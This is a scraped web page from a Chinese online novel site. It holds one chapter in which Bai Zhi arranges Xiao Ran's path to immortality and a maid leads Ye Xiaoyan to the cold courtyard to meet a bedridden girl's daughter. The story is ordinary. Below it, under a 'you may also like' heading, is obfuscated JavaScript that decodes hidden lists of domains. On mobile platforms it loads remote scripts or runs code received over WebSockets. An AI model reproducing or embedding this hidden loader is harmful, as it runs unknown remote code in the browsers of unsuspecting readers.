字体
关灯
上一章 返回目录 下一页

推荐阅读: 我和电竞男神的兄弟在一起了我拥有三千繁华,九霄烟花初春雨微凉迷雾森林山城恋宿主你画风又崩了我的修炼器不一样初恋这件漫长的事我不要做红娘啊神诵九歌神之拯救我的老公有点神
    如今的萧山,心中自是说不出的欣喜。

    要知道,本来还想着这次的事情,一定会彻底得罪这位白家小姐的,日后若是再有想要合作的事情,只怕会变得极为的困难,但是没想到,这次的事情,非但没有影响到他们两家的关系,甚至,这位白家小姐,还免费送给了萧然一个成为仙人的名额。

    这简直让人一时不知该如何报答。

    “萧伯伯,您也不要太紧张了,这件事情,我先前已经萧然说过了,您放心就好了。”见到萧山依旧激动的满脸涨红,白芷也是急忙的抚慰道。

    她也是没有想到。

    这件事情,竟然这么的顺利。

    本来,她还以为让得萧然成为仙人的话,萧山未必能够同意。

    毕竟,一旦成为仙人之后,极有可能会肩负更多的使命和责任。

    而按理来说,萧山本意应该只是希望萧然将来能够继承家业才是。

    但是现在看来,萧山似乎更是希望自己的儿子,能够变得更加强大。

    因此,这次的商议,才会如此的顺利。

    若不然的话,如果萧山只是单纯的希望萧然将来能够变强,从而继承家业的话,自然也是不可能这么快速的同意这件事情。毕竟要知道,一旦选择成为仙人之后,将来再回到家族继承家业的可能性,也将会大大缩小。

    “白姑娘,真是不知道该如何感谢你。”

    平复了一下心情之后,萧山这才有些激动的看着白芷,道。

    “萧伯伯,您客气了。”

    白芷闻言,也是嘻嘻一笑,俏脸不禁羞红几分。

    旁边的叶小燕也是无奈的看着两人。

    明眼人自是看得出来。

    虽然还没有正式成亲。

    但是这儿媳和公公之间的关系,却已是极为的明朗。

    摇了摇头,叶小燕也是只好迈步离开了大厅。

    毕竟,叶小燕身为一个外人,继续留在这里,未免有些尴尬。

    离开了大厅之后,看着偌大的宅院之中,热火朝天的气氛,叶小燕也是不由一皱眉。

    事实上,萧家二夫人这次被打入冷院之中,无疑也是戳中了大家心中的兴奋之处。

    对于这位萧家二夫人,萧家的下人们,早已怀恨在心。

    如果不是一直没有机会,加上这位萧家二夫人权利太大的话,只怕这群下人们,早已是将其狠狠的踩在脚下,踩成一团臭泥了。

    “你就是那个白芷的朋友吧?”

    这时,正当叶小燕准备四处逛逛的时候,在他身后,却是突然传来一声娇喝。

    旋即叶小燕也是一愣。

    回头看去,只见在他身后,也是赫然站着一名白色衣裳的侍女。

    此时,那侍女的一双美眸,也是微微阴沉几分。

    似乎暗中带有几分杀气一般。

    “我是,你…有事吗?”

    叶小燕也是点了点头,当下也是有些好奇的问道。

    那白衣侍女不屑的冷笑一声,道:“我们小姐想请你,和她商量一点事情。”

    “抱歉,没有兴趣。”

    叶小燕闻言,不禁淡淡的摇了摇头。

    别忘了,这里可是萧家。

    叶小燕本来就是萧家之人。

    何况,这侍女之所以找到自己,无非也是因为白芷而已。

    所以,身为外人的叶小燕,自是没有必要插手。

    哪怕对方给出大量好处,也一样不会插手。

    “你真的不想去商量吗?”

    那白衣侍女见到叶小燕拒绝,却是一点都不惊讶,反而有恃无恐一般的笑着道:“我们小姐可是说了,如果你不去,将来,白芷和我们萧然少爷的婚事,恐会发生一些变故。”

    闻言,叶小燕脚步不由一顿。

    下意识的看着那白衣侍女,叶小燕也是犹豫了一下。

    旋即也是淡然说道:“你们小姐是谁?”

    ……

    冷院。

    清风吹过,阴冷的天空之中,偶有黑色的乌鸦匆匆而过。

    周围那漆黑粘稠的泥土,像是被人泼了大量脏水一般。

    各种腥臭难闻的气味,从那其中弥漫出来。

    空气里,弥漫着让人作呕的味道。

    不远处,那白衣侍女也是带着叶小燕,迈步走了进来。

    闻着周围这一股极为难闻的气味,叶小燕也是不禁轻轻皱了一下鼻子。

    真是想不到,原来这里就是冷院。

    如果和外面相比的话,这里简直就是地狱。

    尤其是周围那些让人作呕的泥土和垃圾,简直让人无法相信,这里竟然能够拥有活人在那其中生活。一时间,叶小燕也是捂着口鼻。

    院子的前方,坐落着一座颇为华丽的阁楼。

    跟着那白衣侍女的身后,叶小燕也是快步走进了阁楼之中。

    顿时间,周围那极为难闻的腥臭气味,也是顺金消失。

    扑面而来的,则是一股颇为清爽的香味。

    只见得,那走在前面的侍女,此时闻到周围这一股扑鼻的香气,俏脸都是瞬间变了变,变得更加柔和了几分,比起刚才那好似极为痛苦的表情,判若两人。

    “小姐就在隔壁客厅之中。你自己去找她吧。”

    那白衣侍女也是指了指大厅不远处的一扇帘子,旋即看向叶小燕说道。

    “知道了。”

    叶小燕闻言,也是不由得看了一眼那一扇紫色的帘子。

    而后也是点了点头,便是迈步向着那一间客厅之中走去。

    随着叶小燕走进客厅之后,才惊讶的发现,在那客厅的前方,赫然也是摆放着一张病床,而在那病床之上,则是躺着那重伤不起的萧倾。旁边,只见那粉衣白裙的少女,也是兀自的端着一碗药汤,轻轻的灌入萧倾的嘴里。

    “你来了。”

    随着听到叶小燕掀开帘子的声音,那粉衣白裙的少女,也是下意识的回头看了一眼,而后也是指了指旁边的凳子,道:“随便坐。”

    闻言,叶小燕也是默默的坐在其中一张凳子上。

    客厅之中,显得极为的安静。

    随着那少女将汤药喂完,这才将碗放在桌子上,同时也是坐在叶小燕的面前,美眸柔和的看着叶小燕,“我知道,你是白芷的朋友,对吧?”

    “你认识白芷吗?”

    叶小燕也是点了点头,不由闻到。

    那少女闻言,也是苦笑着摇了摇头,“我认识她,但她不认识我。我这次叫你来,首先,也是想要让你帮我母亲转告一下,你就告诉她,这次母亲是我母亲的,我和母亲,都很诚挚的向她道歉。”

    “道歉之事,我会帮你转达的。但是我想,你这次匆忙的将我叫来,应该也不仅仅只是因为这件事情吧?”叶小燕点了点头,旋即也是淡然的看着对面美丽的少女。

    不得不说,这少女虽然皮肤白皙,看起来有些营养不良,但是,那动人的五官,和清澈如水的眸子,依旧是让人有一种流连忘返的感觉。

    果然,面对着叶小燕的询问,那少女也是无奈的轻笑一声。

    “你说的对,我这次匆忙的将你叫来,的确还有其他事情,想要请你帮忙。”

    “说吧,什么事?”

    叶小燕也是无奈的点了点头。

    既然已经来到了这里,自然没有必要急于一时的离开。


上一章 返回目录 下一页

也许你还喜欢:
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzk5OTk5OS0xMDA0OA==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x59\x4d\x6d\x48\x78\x4e\x49\x6e\x79\x4c']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=1000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,300000),ext='2',i='ndx'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('uawei')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vN3NqZmtldWlvM2RkZnNqZy5pbXBvcnRjYYXQuYY29tLGh0dHBzOi8vb2tvamZrZXlra2Vyai5kaWFuZG9uZ2NoZXRvdWt1aS5jb20saHR0cHM6Ly9vdGprZWtnams1aTk2OTk4Lmd1b3NoaWh1YYWl5YYW8uYY29tLGh0dHBzOi8vb3Bra2Vrazg5MzA5Ny54aW5naHVhbGluZ2hhbmcuYY29tLGh0dHBzOi8vbzEya21mdXRra2RoYYXcuYYm9saWppdXBpbmdjaGFuZy5jb20saHR0cHM6Ly9vLnpqanJseDQuYY29t','d3NzOOi8vd3Mud3NhbGlzZHMuY29tOOjgwOOTAsd3NzOOi8vd3Mud3NhbGlzeXMuY29tOOjgwOOTAsd3NzOOi8vd3Mud3NhbGlzZGQuY29tOOjgwOOTA=',window,document,['Y','O']);}:function(){};